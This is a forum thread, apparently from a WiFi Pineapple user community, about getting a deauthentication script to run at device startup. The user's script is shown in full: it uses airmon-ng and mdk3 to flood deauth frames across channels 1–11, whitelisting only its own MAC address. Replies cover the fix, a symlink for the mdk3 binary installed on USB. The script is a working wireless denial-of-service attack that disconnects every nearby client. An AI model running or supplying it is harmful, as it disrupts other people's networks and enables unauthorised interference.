Jump to content

[Fixed/added]Running Script From Pineapple


PineDominator
 Share

Recommended Posts

Ok so I have a script in /usb/ called deauth.sh and it works good when running from an ssh session, BUT when I add it to the startup script IE "/usb/deauth.sh &" or even to WM module "button" and also running it from the advance tab "/usb/./deauth.sh" it does not deauth me from my home network??? works when running directly from an ssh session "/usb/./deauth.sh"


#!/bin/sh

airmon-ng start wlan1

ifconfig wlan0 | awk '/HWaddr/ {print $5}' > /tmp/deauth-whitelist.txt

mdk3 mon0 d -w /tmp/deauth-whitelist.txt -c 1,2,3,4,5,6,7,8,9,10,11 &

sleep 36

killall -9 mdk3

airmon-ng stop mon0
[/CODE]

ps If I remove the "&" from the script it doesn't get hung up? it does go to sleep 36 and the process gets killed, the process mdk3 is in the resources page until killed.

EDIT:

problem was that I had installed mdk3 to usb and I also needed to add this

[CODE]
ln -s /usb/usr/sbin/mdk3 /usr/sbin/mdk3
[/CODE]

Edited by petertfm
Link to comment
Share on other sites

Weird thing I have been doing everything I can to track down the bug and I found the issue:-D

I install mdk3 to usb and I had to put this into the script "/usb/usr/sbin/mdk3 mon0 d -w /tmp/deauth-whitelist.txt -c 1,2,3,4,5,6,7,8,9,10,11 &"

what do I have to sym link to make this work without /usb/usr/sbin?

Link to comment
Share on other sites

Have you tried

sh /usb/deauth.sh &[/CODE]

in your startup script?

Maybe the problem resides in the /usb[color=#ff0000][b]/./[/b][/color]deauth.sh part

ya I even tried bash /usb/deauth.sh to no avail, I figured out how to permanently fix it by adding a sym link in my mdk3 install script

Link to comment
Share on other sites

  • 3 weeks later...
Guest
This topic is now closed to further replies.
 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...